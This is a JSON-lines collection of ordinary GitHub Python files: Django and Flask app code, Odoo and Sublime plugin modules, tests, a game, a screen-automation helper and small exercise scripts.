+{"seq_id":"23881690085","text":"from symboboard.settings.base import *\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '1-88lzkged_-+418vdood5wqp2v9*7!k(+&j6)pc6&5fir-3@3'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# ENVIRONMENT CONFIGURATION SETTINGS\nLOCAL_DEV = True\nPRODUCTION = False\n\n\n# For testing use 'AllowAny' option\n\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': (\n 'rest_framework.permissions.AllowAny',\n ),\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.TokenAuthentication',\n )\n}\n\n\nif LOCAL_DEV:\n ROOT_URLCONF = 'symboboard.urls_dev'\nelif PRODUCTION:\n ROOT_URLCONF = 'symboboard.urls_prod'\n\n\n# Database\n# https://docs.djangoproject.com/en/2.2/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n","repo_name":"nathanbaleeta/symbo-board","sub_path":"symboboard/settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"9386237726","text":"import sys\r\ninput = sys.stdin.readline\r\nn = int(input()) # 명령 수\r\n\r\nstack_ = []\r\nfor _ in range(n) :\r\n msg = list(map(str, input().split()))\r\n if msg[0] == 'push' :\r\n stack_.append(int(msg[1]))\r\n elif msg[0] == 'pop' :\r\n if len(stack_)>0:\r\n print(stack_.pop())\r\n else :\r\n print(-1)\r\n elif msg[0] == 'size' :\r\n print(len(stack_))\r\n elif msg[0] == 'empty' :\r\n if len(stack_) > 0 :\r\n print(0)\r\n else :\r\n print(1)\r\n elif msg[0] == 'top' :\r\n if len(stack_)>0 :\r\n print(stack_[-1])\r\n else :\r\n print(-1)","repo_name":"seungye-kwak/algorithm","sub_path":"백준/Silver/10828. 스택/스택.py","file_name":"스택.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"42567879910","text":"print(\"This is a todo list program.\")\ntasks = []\ndays = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']\ncreate = True\nwhile create:\n activities = []\n ask = input(\"Enter add tasks or stop: (y/n) \")\n if ask.lower() == 'y':\n day = input(\"Enter todya's day of the week: \").title()\n if day in days:\n current_day = {}\n\n addingTasks = True\n while addingTasks:\n new_tasks = input(\"Enter new tasks: \")\n if new_tasks:\n activities.append(new_tasks)\n else:\n addingTasks = False\n current_day[day] = activities\n tasks.append(current_day)\n else:\n create = False\n\nfor task in tasks:\n for k, v in task.items():\n print(f\"{k}:{v}\")","repo_name":"Sirius1998/todo","sub_path":"todo/proto.py","file_name":"proto.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"86284813827","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport numpy as np\nimport pytest\n\nfrom sofia_redux.scan.custom.hawc_plus.info.info import HawcPlusInfo\n\n\n@pytest.fixture\ndef sofia_camera():\n # Just uses HAWC\n info = HawcPlusInfo()\n info.read_configuration('default.cfg')\n camera = info.get_channels_instance()\n camera.data.fixed_index = np.arange(5)\n camera.data.set_default_values()\n return camera\n\n\ndef test_read_pixel_data(sofia_camera, tmpdir):\n camera = sofia_camera.copy()\n row = '1.0 1.0 - 1.0 1.0 1.0 0 1 1 1'\n filename = str(tmpdir.mkdir('test_read_pixel_data').join(\n 'channel_file.dat'))\n with open(filename, 'w') as f:\n print(row, file=f)\n\n camera.read_pixel_data(filename)\n assert filename in camera.info.configuration_files\n\n\ndef test_read_rcp(sofia_camera, tmpdir):\n camera = sofia_camera.copy()\n row = '0 1 2'\n filename = str(tmpdir.mkdir('test_read_pixel_data').join('rcp.dat'))\n with open(filename, 'w') as f:\n print(row, file=f)\n camera.read_rcp(filename)\n assert filename in camera.info.configuration_files\n","repo_name":"SOFIA-USRA/sofia_redux","sub_path":"sofia_redux/scan/custom/sofia/channels/tests/test_camera.py","file_name":"test_camera.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"}
+{"seq_id":"38800486489","text":"import sublime, sublime_plugin\nfrom subprocess import Popen, PIPE, call, STDOUT\nimport sys, time\n\nstate = {}\n\ndef is_server_running(quick=False):\n\n # this is probably enough to see if everything is running\n if quick:\n if \"server\" in state:\n return True\n else:\n return False\n\n if \"server\" in state:\n if state[\"server\"].poll() == None:\n return True\n else:\n return False\n else:\n return False\n\ndef start_server():\n global state\n # print(\"starting server\")\n if not is_server_running():\n # clean up any old instances that may be running...\n stop_server()\n state[\"server\"] = Popen(state[\"server_command\"], shell=True)\n\n # else:\n # print(\"LuaComplete: server already running\")\n\ndef stop_server(): \n # try to cleanly bring it down.\n shutdown = Popen(state[\"client_command\"] + \" -x\", shell=True)\n shutdown.wait(.5)\n\n # if the command fails, and it's still running. terminate it.\n if shutdown.returncode != 0:\n if is_server_running():\n state[\"server\"].terminate()\n\ndef create_completion(completion):\n (name, completion_type) = completion.split(\":\")\n completion_type = completion_type.strip()\n completion = name\n # add the '(' for functions!\n if completion_type.startswith(\"function\"):\n completion = name + \"(\"\n\n # it's a Lua func and params have been found\n # if \"|\" in completion_type\n # doing this for the speed!\n if len(completion_type) >= 10:\n # split out the function params\n params = completion_type[11:].split()\n\n # set the completion type to just the start\n completion_type = completion_type[0:9] + \"()\"\n\n # figure this thing out\n completion = completion + \", \".join([ \"${{{num}:{name}}}\".format(num=num+1, name=val) for (num, val) in enumerate(params)])\n completion = completion + \")\"\n \n # for c funcs, we can't do completion\n else:\n completion = completion + \"$1)\"\n\n\n return \"{0}\\t{1}\".format(name, completion_type), completion\n\n\nclass LuaComplete(sublime_plugin.EventListener): \n def on_query_completions(self, view, prefix, locations):\n position = locations[0]\n scopes = view.scope_name(position).split()\n\n if ('source.lua' not in scopes or state[\"enabled\"] == False):\n return None\n\n # load the server if it's not running.\n if not is_server_running(quick=True):\n start_server()\n\n # we can only autocomplete certain things\n current_char = view.substr(position-1)\n if current_char not in [\":\", \".\", \"[\", \"(\"]:\n return None\n\n # build the main command\n command = \"{client} -i -c {pos}\".format(client=state[\"client_command\"], pos=str(position))\n \n # append the filename if it exists\n file_name = view.file_name()\n if file_name is not None:\n command = command + \" -f '{0}'\".format(file_name)\n\n # get all the window vars\n package_folders = []\n window_vars = view.window().extract_variables()\n if \"folder\" in window_vars:\n package_folders.append(window_vars[\"folder\"])\n\n if state[\"additional_includes\"]:\n package_folders.append(state[\"additional_includes\"])\n\n # did we find a folder to add?\n if package_folders:\n command = command + \" -r '{0}'\".format(';'.join(package_folders))\n\n\n # get the file contents\n file_contents = view.substr(sublime.Region(0, view.size())).encode('utf8')\n \n # send it to the client\n # print(command)\n client = Popen(command, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT)\n # print(file_contents)\n # print(position)\n\n # send communicate on stdin to the client\n output = client.communicate(file_contents)[0].decode('utf-8')\n # print(\"returncode\", client.returncode)\n\n if client.returncode == 0:\n view.set_status(\"a\", \"\")\n output = output.splitlines()\n output_type = output[0]\n # print(output_type)\n # main output is on lines 1 and below\n output = output[1:]\n # print(output)\n if output_type == \"table\":\n return [ create_completion(x) for x in output ]\n\n else:\n view.set_status(\"a\", \"The lua-complete client failed to return\")\n # potentially retry the command or restart the server if his happens.\n\n def __exit__(self, type, value, traceback):\n stop_server()\n\n# start and stop are really only used for debug\n# class StartServerCommand(sublime_plugin.ApplicationCommand):\n# def run(self):\n# start_server()\n\n# class StopServerCommand(sublime_plugin.ApplicationCommand):\n# def run(self):\n# stop_server()\n\nclass ClearCacheCommand(sublime_plugin.ApplicationCommand):\n def run(self):\n stop_server()\n start_server()\n\nclass DisableCommand(sublime_plugin.ApplicationCommand):\n def run(self):\n global state\n state[\"enabled\"] = False\n\nclass EnableCommand(sublime_plugin.ApplicationCommand):\n def run(self):\n global state\n state[\"enabled\"] = True\n\ndef plugin_loaded():\n global state\n state[\"settings\"] = sublime.load_settings(\"LuaComplete.sublime-settings\")\n\n # strip out the path/port\n path = state[\"settings\"].get(\"path\")\n if path is None:\n path = \"lua-complete\"\n port = state[\"settings\"].get(\"port\")\n if port is None:\n port = 24548\n\n # figure out if it's enabled\n enabled = state[\"settings\"].get(\"enabled\")\n if enabled is None:\n enabled = True\n\n # setup the command.\n state[\"server_command\"] = \"{path} server -p {port}\".format(path=path, port=port)\n state[\"client_command\"] = \"{path} client -p {port}\".format(path=path, port=port)\n state[\"enabled\"] = enabled\n\n # get any additional include locations\n state[\"additional_includes\"] = state[\"settings\"].get(\"additional_includes\")\n","repo_name":"FourierTransformer/LuaComplete-Sublime","sub_path":"LuaComplete.py","file_name":"LuaComplete.py","file_ext":"py","file_size_in_byte":6119,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"}
+{"seq_id":"12147062827","text":"from datetime import datetime\n\nfrom flask import Flask, render_template, abort, redirect, flash, request, url_for\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom forms import NewsForm\n\napp = Flask(__name__)\n# 数据库连接的配置\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:123456@127.0.0.1/flask_news'\napp.config['SECRET_KEY'] = '123123'\n\ndb = SQLAlchemy(app)\n\n\nclass News(db.Model):\n \"\"\" 新闻模型 \"\"\"\n __tablename__ = 'news'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(200), nullable=False, comment='标题')\n img_url = db.Column(db.String(200), nullable=False, comment='主图地址')\n content = db.Column(db.String(2000), nullable=False, comment='新闻内容')\n is_valid = db.Column(db.Boolean, default=True, comment='逻辑删除')\n is_top = db.Column(db.Boolean, default=False, comment='是否置顶')\n created_at = db.Column(db.DateTime, default=datetime.now(), comment='创建时间')\n updated_at = db.Column(db.DateTime, default=datetime.now(), comment='最后修改时间')\n news_type = db.Column(db.Enum('本地', '百家', '娱乐', '军事'), comment='新闻类别')\n\n\n@app.route('/')\ndef index():\n \"\"\" 首页 \"\"\"\n news_list = News.query.filter(News.is_valid == True, News.is_top == True).all()\n return render_template('index.html',\n news_list=news_list)\n\n\n@app.route('/cat//')\ndef cat(news_type):\n \"\"\" 新闻分类页 \"\"\"\n news_list = News.query.filter(News.news_type == news_type, News.is_valid == True).all()\n return render_template('cat.html',\n news_list=news_list,\n news_type=news_type)\n\n\n@app.route('/detail//')\ndef detail(pk):\n \"\"\" 新闻详情页 \"\"\"\n new_obj = News.query.get(pk)\n if new_obj is None:\n abort(404)\n # 新闻是否已经被删除\n if not new_obj.is_valid:\n abort(404)\n return render_template('detail.html',\n new_obj=new_obj)\n\n\n@app.route('/admin/')\n@app.route('/admin//')\ndef admin(page=1):\n \"\"\" 后台管理-新闻首页 \"\"\"\n page_size = 3\n # offset = (page - 1) * page_size\n # page_data = News.query.limit(page_size).offset(offset)\n title = request.args.get('title', '')\n page_data = News.query.filter_by(is_valid=True)\n # 根据标题进行模糊搜索\n if title:\n page_data = page_data.filter(News.title.contains(title))\n page_data = page_data.paginate(page=page, per_page=page_size)\n return render_template('admin/index.html',\n page_data=page_data,\n title=title)\n\n\n@app.route('/admin/news/add/', methods=['GET', 'POST'])\ndef news_add():\n \"\"\" 新增新闻 \"\"\"\n # 手动关闭CSRF保护\n # form = NewsForm(csrf_enabled=False)\n form = NewsForm()\n if request.method == 'POST':\n if form.validate_on_submit():\n news_obj = News(\n title=form.title.data,\n content=form.content.data,\n img_url=form.img_url.data,\n news_type=form.news_type.data\n )\n db.session.add(news_obj)\n db.session.commit()\n print('新增成功')\n flash('新增成功', 'success')\n return redirect(url_for('admin'))\n else:\n flash('您的表单中还有错误,请修改', 'danger')\n print('表单没有通过验证', form.errors)\n return render_template('admin/add.html',\n form=form)\n\n\n@app.route('/admin/news/update//', methods=['GET', 'POST'])\ndef news_update(pk):\n \"\"\" 修改新闻 \"\"\"\n news_obj = News.query.get(pk)\n if news_obj is None:\n abort(404)\n if not news_obj.is_valid:\n abort(404)\n form = NewsForm(obj=news_obj)\n if request.method == 'POST':\n if form.validate_on_submit():\n news_obj.title = form.title.data\n news_obj.content = form.content.data\n news_obj.img_url = form.img_url.data\n news_obj.news_type = form.news_type.data\n news_obj.is_top = form.is_top.data\n news_obj.updated_at = datetime.now()\n db.session.add(news_obj)\n db.session.commit()\n flash('新闻修改成功', 'success')\n return redirect(url_for('admin'))\n else:\n flash('您的表单中还有错误,请修改', 'danger')\n return render_template('admin/update.html', form=form)\n\n\n@app.route('/admin/news/delete//', methods=['POST'])\ndef news_delete(pk):\n \"\"\" 逻辑删除新闻 \"\"\"\n if request.method == 'POST':\n news_obj = News.query.get(pk)\n # 新闻不存在\n if news_obj is None:\n return 'no'\n # 新闻已经被删除掉了\n if not news_obj.is_valid:\n return 'no'\n news_obj.is_valid = False\n db.session.add(news_obj)\n db.session.commit()\n return 'yes'\n return 'no'\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"liuyaokang/flask_news","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"32340163841","text":"import sys\nimport subprocess\ntry:\n import numpy as np\nexcept ImportError:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install','numpy'])\n import numpy as np\n\ntry:\n import pandas as pd\nexcept ImportError:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install','pandas'])\n import pandas as pd\n\ntry:\n from datetime import datetime, time, timedelta\nexcept ImportError:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install','datetime'])\n from datetime import datetime, time, timedelta\ntry:\n import json\nexcept ImportError:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install', 'json'])\n import json\ndef reader():\n '''\n Inputs:\n None\n Output:\n None\n Function:\n Creates the Route of the Current System from Excel Files\n '''\n shuttle_schedule = pd.read_excel(\"Shuttle Schedule with Targets.xlsx\",sheet_name=2)\n print(shuttle_schedule.head())\n shuttles=shuttle_schedule.columns.to_list()[3:]\n stops=shuttle_schedule['Stop'].to_list()\n stops_id=shuttle_schedule['Stop ID'].to_list()\n print(stops)\n print(shuttles)\n zero=datetime(year=1900,month=1,day=1,hour=0,minute=30)\n temp_data=[]\n new_shuttles=[]\n rray=[]\n bol_list=[1]*100\n for j,bus in enumerate(shuttles):\n route=shuttle_schedule[bus].to_list()\n tim=[]\n r=0\n for i, stop in enumerate(route):\n if type(stop) is str:\n stop=stop[:-4]\n t = datetime.strptime(str(stop), '%H:%M')\n tim.append(float((t-zero).seconds))\n elif type(stop) is float:\n r += 1\n tim.append(np.inf)\n else:\n t= datetime.strptime(str(stop)[:-3], '%H:%M')\n tim.append(float((t-zero).seconds))\n temp_data.append(tim)\n rray.append(r)\n try:\n if shuttles[j][0:-2]==shuttles[j-1]:\n bol_list[j]=0\n temp_data[j-1]=temp_data[j-1]+tim\n rray[j-1]=rray[j-1]+rray[j]\n if shuttles[j][0:-2]==shuttles[j-2]:\n bol_list[j]=0\n temp_data[j-2]=temp_data[j-2]+tim\n rray[j-2]=rray[j-2]+rray[j]\n except:\n pass\n\n\n actual_r=[]\n actual_temp_data=[]\n for i in range(len(temp_data)):\n if bol_list[i]:\n actual_temp_data.append(temp_data[i])\n new_shuttles.append(shuttles[i])\n actual_r.append(rray[i])\n\n final_td=[]\n for i, secs in enumerate(actual_temp_data):\n tim=secs\n sorted_route=np.argsort(tim)\n sorted_route = sorted_route[0:-actual_r[i]]\n route_s=[]\n route_names=[]\n for f,j in enumerate(sorted_route):\n print(j)\n k=int(j)\n if k>=(len(stops_id)):\n k=k-(len(stops_id))\n if k>=(len(stops_id)):\n k=k-(len(stops_id))\n route_s.append(k)\n route_names.append(stops_id[k])\n final_td.append(route_names)\n with open(\"current_routes\", \"w\") as fp:\n json.dump([new_shuttles]+final_td, fp)\n\n\n\n","repo_name":"connormcintee/Route-Optimization","sub_path":"Framework/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"69878419111","text":"import unittest\n\nimport numpy as np\nfrom hypothesis import given, settings, assume\nfrom numpy.testing import assert_allclose\nfrom tmma.normalisation.tmm import two_sample_tmm\n\nfrom .r_helpers import r_edger_calcFactorTMM\nfrom .strategies import uint_counts_array_and_a_lib_size, \\\n uint_counts_array, poisson_counts_array\n\n\nclass HypothesisTestCalcFactorTMM(unittest.TestCase):\n\n @given(uint_counts_array_and_a_lib_size(max_cols=2))\n @settings(max_examples=500, report_multiple_bugs=False)\n def test_two_sample_tmm_uints_and_random_library_size(self, counts_lib_size):\n \"\"\"\n Given random unsigned integer counts and a random library size\n Check if the output is the same as edgeR's.\n :param counts_lib_size:\n :return:\n \"\"\"\n\n counts, lib_size = counts_lib_size\n\n obs = counts[:, 0].copy()\n ref = counts[:, 1].copy()\n\n lib_size_obs, lib_size_ref = lib_size\n\n r_answer = r_edger_calcFactorTMM(obs, ref,\n lib_size_obs=lib_size_obs,\n lib_size_ref=lib_size_ref)\n\n # No point testing bugs in R\n assume(not np.isinf(r_answer))\n assume(not np.isnan(r_answer))\n\n py_answer = two_sample_tmm(obs, ref,\n lib_size_obs=lib_size_obs,\n lib_size_ref=lib_size_ref)\n assert_allclose(r_answer, py_answer, rtol=1e-6)\n\n @given(uint_counts_array(max_cols=2).filter(lambda x: (np.sum(x, axis=0) > 0).all()))\n @settings(max_examples=500, report_multiple_bugs=False)\n def testtwo_sample_tmm_uints_only(self, counts):\n \"\"\"\n Given random unsigned integer counts,\n check if the output is the same as edgeR's.\n :param counts:\n :return:\n \"\"\"\n\n obs = counts[:, 0]\n ref = counts[:, 1]\n\n r_answer = r_edger_calcFactorTMM(obs, ref)\n # No point testing bugs in R\n assume(not np.isinf(r_answer))\n assume(not np.isnan(r_answer))\n\n py_answer = two_sample_tmm(obs, ref)\n\n assert_allclose(r_answer, py_answer, rtol=1e-6)\n\n @given(poisson_counts_array(max_cols=2).filter(lambda x: (np.sum(x, axis=0) > 0).all()))\n @settings(max_examples=500, report_multiple_bugs=False)\n def testtwo_sample_tmm_poisson_only(self, counts):\n \"\"\"\n Given random poisson counts,\n check if output matches edgeR.\n\n :param counts:\n :return:\n \"\"\"\n obs = counts[:, 0]\n ref = counts[:, 1]\n\n r_answer = r_edger_calcFactorTMM(obs, ref)\n # No point testing bugs in R\n assume(not np.isinf(r_answer))\n assume(not np.isnan(r_answer))\n\n py_answer = two_sample_tmm(obs, ref)\n # Allow to differ by 2/100th\n assert_allclose(r_answer, py_answer, rtol=0, atol=2e-2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"lukauskas/tmma","sub_path":"tests/edger_compatibility/test_calc_factor_tmm.py","file_name":"test_calc_factor_tmm.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"33879378965","text":"import re\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import ValidationError\n\n\nclass BarcodeRule(models.Model):\n _inherit = 'barcode.rule'\n\n def _default_encoding(self):\n return 'gs1-128' if self.env.context.get('is_gs1') else 'any'\n\n encoding = fields.Selection(\n selection_add=[('gs1-128', 'GS1-128')], default=_default_encoding,\n ondelete={'gs1-128': 'set default'})\n type = fields.Selection(\n selection_add=[\n ('quantity', 'Quantity'),\n ('location', 'Location'),\n ('location_dest', 'Destination location'),\n ('lot', 'Lot number'),\n ('package', 'Package'),\n ('use_date', 'Best before Date'),\n ('expiration_date', 'Expiration Date'),\n ('package_type', 'Package Type'),\n ('pack_date', 'Pack Date'),\n ], ondelete={\n 'quantity': 'set default',\n 'location': 'set default',\n 'location_dest': 'set default',\n 'lot': 'set default',\n 'package': 'set default',\n 'use_date': 'set default',\n 'expiration_date': 'set default',\n 'package_type': 'set default',\n 'pack_date': 'set default',\n })\n is_gs1_nomenclature = fields.Boolean(related=\"barcode_nomenclature_id.is_gs1_nomenclature\")\n gs1_content_type = fields.Selection([\n ('date', 'Date'),\n ('measure', 'Measure'),\n ('identifier', 'Numeric Identifier'),\n ('alpha', 'Alpha-Numeric Name'),\n ], string=\"GS1 Content Type\",\n help=\"The GS1 content type defines what kind of data the rule will process the barcode as:\\\n * Date: the barcode will be converted into a Odoo datetime;\\\n * Measure: the barcode's value is related to a specific UoM;\\\n * Numeric Identifier: fixed length barcode following a specific encoding;\\\n * Alpha-Numeric Name: variable length barcode.\")\n gs1_decimal_usage = fields.Boolean('Decimal', help=\"If True, use the last digit of AI to determine where the first decimal is\")\n associated_uom_id = fields.Many2one('uom.uom')\n\n @api.constrains('pattern')\n def _check_pattern(self):\n gs1_rules = self.filtered(lambda rule: rule.encoding == 'gs1-128')\n for rule in gs1_rules:\n try:\n re.compile(rule.pattern)\n except re.error as error:\n raise ValidationError(_(\"The rule pattern \\\"%s\\\" is not a valid Regex: \", rule.name) + str(error))\n groups = re.findall(r'\\([^)]*\\)', rule.pattern)\n if len(groups) != 2:\n raise ValidationError(_(\n \"The rule pattern \\\"%s\\\" is not valid, it needs two groups:\"\n \"\\n\\t- A first one for the Application Identifier (usually 2 to 4 digits);\"\n \"\\n\\t- A second one to catch the value.\",\n rule.name))\n\n super(BarcodeRule, (self - gs1_rules))._check_pattern()\n","repo_name":"odoo/odoo","sub_path":"addons/barcodes_gs1_nomenclature/models/barcode_rule.py","file_name":"barcode_rule.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":31745,"dataset":"github-code","pt":"71"}
+{"seq_id":"23068225926","text":"import pygame\n\nfrom settings import Settings\nfrom ship import Ship\nimport game_functions as gf\nfrom pygame.sprite import Group\nfrom game_stats import GameStats\nfrom button import Button\nfrom scoreboard import Scoreboard\n\ndef run_game():\n # 初始化游戏并创建一个屏幕对象\n pygame.init()\n ai_settings = Settings()\n screen =pygame.display.set_mode((ai_settings.screen_width,ai_settings.screen_height))\n pygame.display.set_caption(\"Alien Invasion\")\n # 创建一艘飞船\n ship = Ship(ai_settings,screen)\n # 创建一个用于存储子弹的编组\n bullets = Group()\n aliens = Group()\n # 创建一群外星人群\n gf.create_fleet(ai_settings,screen,ship,aliens)\n # 创建一个用于存储游戏统计信息的实例\n stats = GameStats(ai_settings)\n sb = Scoreboard(ai_settings,screen,stats)\n # 创建Play按钮\n play_button = Button(ai_settings,screen,\"Play\")\n\n\n\n #开始游戏的主循环\n while True:\n #监视键盘和鼠标事件\n gf.check_events(ai_settings,screen,ship,bullets, stats, play_button, aliens,sb)\n if stats.game_active:\n # 更新飞船\n ship.update()\n if ai_settings.is_const_shoot:\n gf.fire_bullet(ai_settings,screen,ship,bullets)\n gf.update_bullets(ai_settings, screen, ship, aliens, bullets,stats,sb)\n gf.update_aliens(ai_settings, aliens, ship, stats, screen, bullets, sb)\n #绘制屏幕\n gf.update_screen(ai_settings,screen,ship,bullets,aliens, stats, play_button,sb)\n\nrun_game()\n","repo_name":"youthnone/alien_invasion","sub_path":"alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73257554791","text":"import cv2\nimport numpy as np\nimport pyautogui as gui\n\nfrom time import sleep\n\ndef findTempl(_template_name, _threshold, _region):\n\n screen = gui.screenshot(region=_region)\n screen = cv2.cvtColor(np.array(screen), cv2.COLOR_RGB2BGRA)\n\n templ = cv2.imread('templates/'+_template_name+'.png', cv2.IMREAD_UNCHANGED)\n rectangles = []\n\n result = cv2.matchTemplate(screen, templ, cv2.TM_CCOEFF_NORMED)\n ypos, xpos = np.where(result >= _threshold)\n height, width = templ.shape[:2]\n for (x, y) in zip(xpos,ypos):\n rectangles.append([x, y, width, height])\n rectangles.append([x, y, width, height])\n\n rectangles, weights = cv2.groupRectangles(rectangles, 1, 0.8)\n\n for (x, y, w, h) in rectangles:\n cv2.rectangle(screen, (x, y), (x+w, y+h), (255,255,255), 2)\n\n cv2.imshow('View', screen)\n cv2.waitKey(200)\n\n return rectangles\n\ndef foundTempl(_template_name, _threshold, _region):\n rects = findTempl(_template_name, _threshold, _region)\n return len(rects) > 0\n\ndef moveMouseFTP(_vec, _durInSec):\n cent = (gui.size()[0]/2, gui.size()[1]/2)\n target = (cent[0] + _vec[0], cent[1] + _cent[1])\n gui.moveTo(traget, _durInSec)\n\ndef waitCountdown(_ticks, _interval):\n for i in range(_ticks):\n print(_ticks-i)\n sleep(_interval)\n\ndef screamImBotter():\n messages = []\n messages.append(\"I'm a botter. Report me!\")\n messages.append(\"I use an educational bot for an unfair advantage!\")\n messages.append(\"I run a bot script atm. Report me!\")\n messages.append(\"I'm using a fishing bot, I'm not allowed to.\")\n for line in messages:\n gui.press(\"enter\")\n for char in line:\n gui.press(char)\n gui.press(enter)\n","repo_name":"linozuber/notFishing","sub_path":"botutils.py","file_name":"botutils.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"17976064085","text":"menu = 0\nenfeite = '=-=' * 7\nvalor_1 = int(input('Primeiro valor: '))\nvalor_2 = int(input('Segundo valor: '))\nwhile menu != 6:\n print('[ 1 ] somar \\n[ 2 ] multiplicar\\n[ 3 ] maior \\n[ 4 ] novos números\\n[ 5 ] potencia\\n[ 6 ] sair do progama')\n menu = int(input('>>>>> Qual é a sua opção ? '))\n if menu == 1:\n soma = valor_1 + valor_2\n print(f'A soma entre {valor_1} + {valor_2} é {soma}') \n elif menu == 2: \n multi = valor_1 * valor_2\n print(f'A multiplicação de {valor_1} X {valor_2} é {multi}')\n elif menu == 3:\n if valor_1 != valor_2:\n if valor_1 > valor_2:\n maior = valor_1\n menor = valor_2\n if valor_1 < valor_2:\n maior = valor_2\n menor = valor_1\n print(f'Entre {valor_1} e {valor_2}, o maior é {maior} e o menor é {menor}')\n elif valor_1 == valor_2:\n print(f'Os valores {valor_1} e {valor_2} são iguais') \n elif menu == 4:\n print('Informe os números novamente:')\n valor_1 = int(input('Primeiro valor: '))\n valor_2 = int(input('Segundo valor: '))\n elif menu == 5:\n escolha = int(input('Você quer que o primeiro ou o segundo valor seja a base ? [1/2] ' ))\n if escolha == 1:\n base = valor_1\n expo = valor_2\n pot = valor_1 ** valor_2\n elif escolha == 2: \n base = valor_2\n expo = valor_1\n pot = valor_2 ** valor_1\n print(f'O resultado do calculo usando {base} como base, e {expo} como expoente. Teremos o valor da potência igual a {pot}')\n if menu != 6:\n print(enfeite)\nprint('-==-==- F I M -==-==-')\n","repo_name":"RuanBarretodosSantos/python","sub_path":"scripts/exercicios/ex059.py","file_name":"ex059.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"39421050843","text":"print(\"\\n\\n\\n\",\"\\t\\t\\t\\t\\t\\t\", \"Розрахунково-графічна робота\", sep = \"\")\r\nprint(\"\\t\\t\\t\\t\\t\\t\", \"Варіант №22\", sep = \"\")\r\nprint(\"\\n\\n\\n\",\"\\t\\t\\t\\t\", \"Тема:'Програма інтерполювання таблично заданої функції'\", sep = \"\")\r\nprint(\"\\n\\n\\n\",\"\\t\\t\\t\", \"Виконала\",\"\\t\\t\\t\\t\\t\\t\\t\\t\", \"Харчук О.О.\", sep = \"\")\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nwhile True:\r\n try:\r\n n=int(input('Введіть к-сть значень x або y (їх кількість однакова), що задаються:'))\r\n except:\r\n print ('Помилка! К-сть може бути задан лише цілим додатним значенням.')\r\n array = input('Введіть значення x через пробіл (формулювання першого рядка таблиці зі значеннями змінної x):').split()\r\n x=np.array(array, dtype=float)\r\n array = input('Введіть значення y через пробіл (формулювання другого рядка таблиці зі значеннями змінної y):').split()\r\n y=np.array(array, dtype=float)\r\n def lagranz(x,y,t):\r\n z=0\r\n for j in range(len(y)):\r\n p1=1; p2=1\r\n for i in range(len(x)):\r\n if i==j:\r\n p1=p1*1; p2=p2*1 \r\n else: \r\n p1=p1*(t-x[i])\r\n p2=p2*(x[j]-x[i])\r\n z=z+y[j]*p1/p2\r\n return z\r\n xnew=np.linspace(np.min(x),np.max(x),100)\r\n ynew=[lagranz(x,y,i) for i in xnew]\r\n plt.plot(x,y,'o',xnew,ynew)\r\n plt.grid(True)\r\n plt.show()\r\n print('Бажаєте ввести інші значення? Введіть \"так\" або \"ні\".')\r\n while True:\r\n ans = input()\r\n if ans == \"так\" or ans == \"ні\":\r\n break\r\n else:\r\n print('Недопустима відповідь. Введіть так або ні.\\n')\r\n if ans == \"ні\":\r\n print('До зустрічі!')\r\n break\r\n","repo_name":"dianakobzar/RGR_Olefir","sub_path":"rgr km02/Харчук/8 етап/РГР (22 варіант).py","file_name":"РГР (22 варіант).py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
